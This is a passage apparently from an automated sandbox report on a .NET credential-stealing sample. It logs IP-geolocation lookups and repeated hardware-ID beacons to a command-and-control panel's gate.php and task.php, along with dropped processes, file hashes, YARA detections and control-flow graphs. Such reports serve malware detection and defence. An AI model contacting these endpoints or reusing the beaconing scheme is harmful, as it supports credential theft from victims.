                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        4192.168.2.349706208.95.112.180C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:22.916079998 CET108OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Jan 23, 2023 21:25:22.949666977 CET108INHTTP/1.1 200 OK
                                                                                                                                        Date: Mon, 23 Jan 2023 20:25:22 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 293
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 36
                                                                                                                                        X-Rl: 40
                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        5192.168.2.34970792.249.45.11380C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:23.289814949 CET109OUTGET /gate.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Jan 23, 2023 21:25:23.524386883 CET109INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 4
                                                                                                                                        date: Mon, 23 Jan 2023 20:25:23 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf 30
                                                                                                                                        Data Ascii: 0
                                                                                                                                        Jan 23, 2023 21:25:24.159368038 CET110OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:25:24.331115007 CET110INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:25:24 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        6192.168.2.34970892.249.45.11380C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:29.484357119 CET111OUTGET /gate.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:25:29.625597000 CET111INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:25:29 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        7192.168.2.34970992.249.45.11380C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:33.866869926 CET112OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:25:34.095911026 CET112INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:25:34 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        8192.168.2.349710208.95.112.180C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:34.380011082 CET113OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Jan 23, 2023 21:25:34.413429976 CET113INHTTP/1.1 200 OK
                                                                                                                                        Date: Mon, 23 Jan 2023 20:25:33 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 293
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 24
                                                                                                                                        X-Rl: 39
                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        9192.168.2.349711208.95.112.180C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:36.957734108 CET114OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Jan 23, 2023 21:25:36.991178036 CET115INHTTP/1.1 200 OK
                                                                                                                                        Date: Mon, 23 Jan 2023 20:25:36 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 293
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 21
                                                                                                                                        X-Rl: 38
                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}
                                                                                                                                        Jan 23, 2023 21:25:37.391151905 CET115OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Jan 23, 2023 21:25:37.425131083 CET115INHTTP/1.1 200 OK
                                                                                                                                        Date: Mon, 23 Jan 2023 20:25:36 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 293
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 21
                                                                                                                                        X-Rl: 37
                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


                                                                                                                                        Click to jump to process

                                                                                                                                        Click to jump to process

                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                        Click to jump to process

                                                                                                                                        Target ID:0
                                                                                                                                        Start time:21:24:56
                                                                                                                                        Start date:23/01/2023
                                                                                                                                        Path:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        Imagebase:0x760000
                                                                                                                                        File size:549415 bytes
                                                                                                                                        MD5 hash:7A483865F3F1999AB24ED75F710649AD
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: 00000000.00000002.527402882.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_Predator, Description: Yara detected Predator, Source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Reputation:low

                                                                                                                                        Target ID:10
                                                                                                                                        Start time:21:25:19
                                                                                                                                        Start date:23/01/2023
                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Zip.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Zip.exe"
                                                                                                                                        Imagebase:0x176e4530000
                                                                                                                                        File size:32256 bytes
                                                                                                                                        MD5 hash:AF07E88EC22CC90CEBFDA29517F101B9
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: 0000000A.00000000.306320250.00000176E4532000.00000002.00000001.01000000.00000009.sdmp, Author: unknown
                                                                                                                                        • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Zip.exe, Author: unknown
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        • Detection: 77%, ReversingLabs
                                                                                                                                        Reputation:moderate

                                                                                                                                        Target ID:11
                                                                                                                                        Start time:21:25:20
                                                                                                                                        Start date:23/01/2023
                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\update_232309.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\update_232309.exe" / start
                                                                                                                                        Imagebase:0x980000
                                                                                                                                        File size:549415 bytes
                                                                                                                                        MD5 hash:7A483865F3F1999AB24ED75F710649AD
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Predator, Description: Yara detected Predator, Source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:low

                                                                                                                                        Target ID:12
                                                                                                                                        Start time:21:25:29
                                                                                                                                        Start date:23/01/2023
                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\update_232309.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\update_232309.exe" / start
                                                                                                                                        Imagebase:0xa50000
                                                                                                                                        File size:549415 bytes
                                                                                                                                        MD5 hash:7A483865F3F1999AB24ED75F710649AD
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Reputation:low

                                                                                                                                        Reset < >

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:17.9%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:0%
                                                                                                                                          Total number of Nodes:3
                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                          execution_graph 10916 7ffbad398c44 10918 7ffbad398c4d LoadLibraryW 10916->10918 10919 7ffbad398cfd 10918->10919

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 0 7ffbad393510-7ffbad39ec58 call 7ffbad39dd10 6 7ffbad39ec5a-7ffbad39ec63 0->6 7 7ffbad39ec7e-7ffbad39ec87 0->7 6->7 9 7ffbad39ec89-7ffbad39ec99 7->9 10 7ffbad39ecae-7ffbad39ecb1 7->10 9->10 12 7ffbad39ed04-7ffbad39ed07 10->12 13 7ffbad39ecb3-7ffbad39ecb8 10->13 16 7ffbad39ed49-7ffbad39ed4c 12->16 17 7ffbad39ed09-7ffbad39ed19 call 7ffbad39e9d0 12->17 14 7ffbad39ecea-7ffbad39ed03 13->14 15 7ffbad39ecba-7ffbad39ecd1 13->15 14->12 15->14 25 7ffbad39ecd3-7ffbad39ecd6 15->25 18 7ffbad39ed4e-7ffbad39ed5b call 7ffbad39e8e0 16->18 19 7ffbad39ed5d-7ffbad39ed66 16->19 17->16 28 7ffbad39ed1b-7ffbad39ed44 17->28 18->19 31 7ffbad39ed68-7ffbad39eda1 call 7ffbad393548 18->31 19->31 29 7ffbad39ecdc-7ffbad39ece5 25->29 30 7ffbad39f0be-7ffbad39f0d9 25->30 39 7ffbad39f0a7-7ffbad39f0bd 28->39 33 7ffbad39efe3-7ffbad39eff5 29->33 42 7ffbad39f0e0-7ffbad39f14d call 7ffbad393280 30->42 45 7ffbad39efa7-7ffbad39efaa 31->45 46 7ffbad39eda7-7ffbad39edbb 31->46 74 7ffbad39f154-7ffbad39f180 42->74 48 7ffbad39eff6-7ffbad39f024 45->48 49 7ffbad39efac-7ffbad39efc8 45->49 53 7ffbad39f26a-7ffbad39f29a 46->53 54 7ffbad39edc1-7ffbad39edd7 46->54 59 7ffbad39f026-7ffbad39f02a 48->59 60 7ffbad39f077-7ffbad39f07c 48->60 49->48 70 7ffbad39efca-7ffbad39efd4 49->70 67 7ffbad39f29c 53->67 68 7ffbad39f2a1-7ffbad39f2c6 53->68 62 7ffbad39edd9-7ffbad39edeb 54->62 63 7ffbad39ee0b-7ffbad39ee1f 54->63 66 7ffbad39f02d-7ffbad39f057 call 7ffbad393508 59->66 73 7ffbad39f083-7ffbad39f098 60->73 62->63 72 7ffbad39eded-7ffbad39edf7 62->72 63->53 81 7ffbad39ee25-7ffbad39ee36 call 7ffbad39e8e0 63->81 82 7ffbad39f059-7ffbad39f05e 66->82 67->68 70->74 75 7ffbad39efda-7ffbad39efe1 70->75 72->42 79 7ffbad39edfd-7ffbad39ee06 72->79 96 7ffbad39f1f6-7ffbad39f240 call 7ffbad393278 74->96 97 7ffbad39f182-7ffbad39f1ef call 7ffbad3932e8 74->97 75->33 79->33 89 7ffbad39ee38-7ffbad39ee55 81->89 90 7ffbad39ee5a-7ffbad39eedb 81->90 86 7ffbad39f099-7ffbad39f0a4 82->86 87 7ffbad39f060-7ffbad39f06f 82->87 86->39 87->82 95 7ffbad39f071-7ffbad39f075 87->95 105 7ffbad39eedd-7ffbad39eee0 89->105 90->105 95->60 95->66 96->53 97->96 105->45 108 7ffbad39eee6-7ffbad39eef3 105->108 110 7ffbad39eef6-7ffbad39ef0b 108->110 115 7ffbad39ef0d-7ffbad39ef11 110->115 118 7ffbad39ef83-7ffbad39ef8f 115->118 119 7ffbad39ef13-7ffbad39ef1a 115->119 118->73 123 7ffbad39ef1c-7ffbad39ef51 call 7ffbad39dd10 119->123 133 7ffbad39ef94-7ffbad39efa2 123->133 134 7ffbad39ef53-7ffbad39ef64 123->134 133->39 136 7ffbad39ef66-7ffbad39ef7b 134->136 138 7ffbad39ef7d-7ffbad39ef81 136->138 138->118 138->123
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: ^_I$7]_L
                                                                                                                                          • API String ID: 0-2983265569
                                                                                                                                          • Opcode ID: acab02144e35d1c8ef3b028d165dc78e345cf2be79db2ce5fd2238c9e8756a17
                                                                                                                                          • Instruction ID: 21cf9cd658b33cee569a6d6b6d9862ef4061207dc67d5687b51c0ca1e483eb64
                                                                                                                                          • Opcode Fuzzy Hash: acab02144e35d1c8ef3b028d165dc78e345cf2be79db2ce5fd2238c9e8756a17
                                                                                                                                          • Instruction Fuzzy Hash: 6632B571A19E194FEB69EB2CD8557BCB7D1EF5C350F0401BAD84ED3292EE24AC428781
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1028 7ffbad3934b0-7ffbad39db9f 1031 7ffbad39dba8-7ffbad39dbac 1028->1031 1032 7ffbad39dba1-7ffbad39dba6 1028->1032 1033 7ffbad39dbaf-7ffbad39dbc2 1031->1033 1032->1033 1035 7ffbad39dc9b-7ffbad39dcb9 call 7ffbad3941c0 1033->1035 1038 7ffbad39dbc7-7ffbad39dbcd 1035->1038 1039 7ffbad39dcbf 1035->1039 1041 7ffbad39dbd9-7ffbad39dbe6 1038->1041 1042 7ffbad39dbcf 1038->1042 1040 7ffbad39dcce-7ffbad39dce3 1039->1040 1043 7ffbad39dbe8-7ffbad39dc03 1041->1043 1044 7ffbad39dc1c-7ffbad39dc2f 1041->1044 1042->1041 1048 7ffbad39dce4-7ffbad39dd2e 1043->1048 1049 7ffbad39dc09-7ffbad39dc1a 1043->1049 1052 7ffbad39dc32-7ffbad39dc35 1044->1052 1057 7ffbad39dd30-7ffbad39dd42 1048->1057 1058 7ffbad39dd91-7ffbad39dd9c 1048->1058 1049->1052 1054 7ffbad39dc83-7ffbad39dc85 1052->1054 1055 7ffbad39dc37-7ffbad39dc39 1052->1055 1059 7ffbad39dc87 1054->1059 1060 7ffbad39dc91-7ffbad39dc94 1054->1060 1061 7ffbad39dc45-7ffbad39dc48 1055->1061 1062 7ffbad39dc3b 1055->1062 1066 7ffbad39dd44-7ffbad39dd64 1057->1066 1067 7ffbad39dd66-7ffbad39dd70 call 7ffbad393550 1057->1067 1070 7ffbad39ddb9-7ffbad39dddf 1058->1070 1071 7ffbad39dd9e-7ffbad39dda2 1058->1071 1059->1060 1060->1035 1061->1054 1064 7ffbad39dc4a-7ffbad39dc4c 1061->1064 1062->1061 1068 7ffbad39dc58-7ffbad39dc5b 1064->1068 1069 7ffbad39dc4e 1064->1069 1077 7ffbad39dda9-7ffbad39ddb8 1066->1077 1082 7ffbad39dd89-7ffbad39dd8f 1067->1082 1083 7ffbad39dd72-7ffbad39dd74 1067->1083 1068->1054 1074 7ffbad39dc5d-7ffbad39dc5f 1068->1074 1069->1068 1086 7ffbad39ddf0-7ffbad39de29 call 7ffbad393300 1070->1086 1071->1077 1075 7ffbad39dc6b-7ffbad39dc6e 1074->1075 1076 7ffbad39dc61 1074->1076 1075->1054 1080 7ffbad39dc70-7ffbad39dc72 1075->1080 1076->1075 1084 7ffbad39dc74 1080->1084 1085 7ffbad39dc7e-7ffbad39dc81 1080->1085 1082->1077 1083->1086 1087 7ffbad39dd76-7ffbad39dd88 1083->1087 1084->1085 1085->1054 1088 7ffbad39dcc1-7ffbad39dcc9 1085->1088 1095 7ffbad39de2b 1086->1095 1096 7ffbad39de2d-7ffbad39de80 1086->1096 1088->1040 1090 7ffbad39dccb 1088->1090 1090->1040 1095->1096 1099 7ffbad39dea7-7ffbad39debf 1096->1099 1100 7ffbad39de82-7ffbad39de99 call 7ffbad393510 1096->1100 1104 7ffbad39df01-7ffbad39df04 1099->1104 1105 7ffbad39dec1-7ffbad39ded8 call 7ffbad393530 1099->1105 1103 7ffbad39de9e-7ffbad39dea2 1100->1103 1108 7ffbad39e0d7-7ffbad39e0e7 1103->1108 1106 7ffbad39df16-7ffbad39df22 1104->1106 1107 7ffbad39df06-7ffbad39df14 1104->1107 1110 7ffbad39dedd-7ffbad39dedf 1105->1110 1117 7ffbad39e0a3-7ffbad39e0b4 1106->1117 1107->1106 1116 7ffbad39df27-7ffbad39df46 1107->1116 1113 7ffbad39def3-7ffbad39defc 1110->1113 1114 7ffbad39dee1-7ffbad39deee 1110->1114 1115 7ffbad39e0c4-7ffbad39e0d2 1113->1115 1114->1117 1121 7ffbad39df48-7ffbad39df75 1116->1121 1122 7ffbad39df7a-7ffbad39df9d 1116->1122 1129 7ffbad39e0d3-7ffbad39e0d4 1121->1129 1127 7ffbad39dfa3-7ffbad39dfa9 1122->1127 1128 7ffbad39e081-7ffbad39e095 1122->1128 1130 7ffbad39dfbc-7ffbad39dfbf 1127->1130 1131 7ffbad39dfab-7ffbad39dfbb 1127->1131 1136 7ffbad39e0b5-7ffbad39e0b9 1128->1136 1137 7ffbad39e097-7ffbad39e09c 1128->1137 1129->1108 1134 7ffbad39e01e-7ffbad39e03e 1130->1134 1135 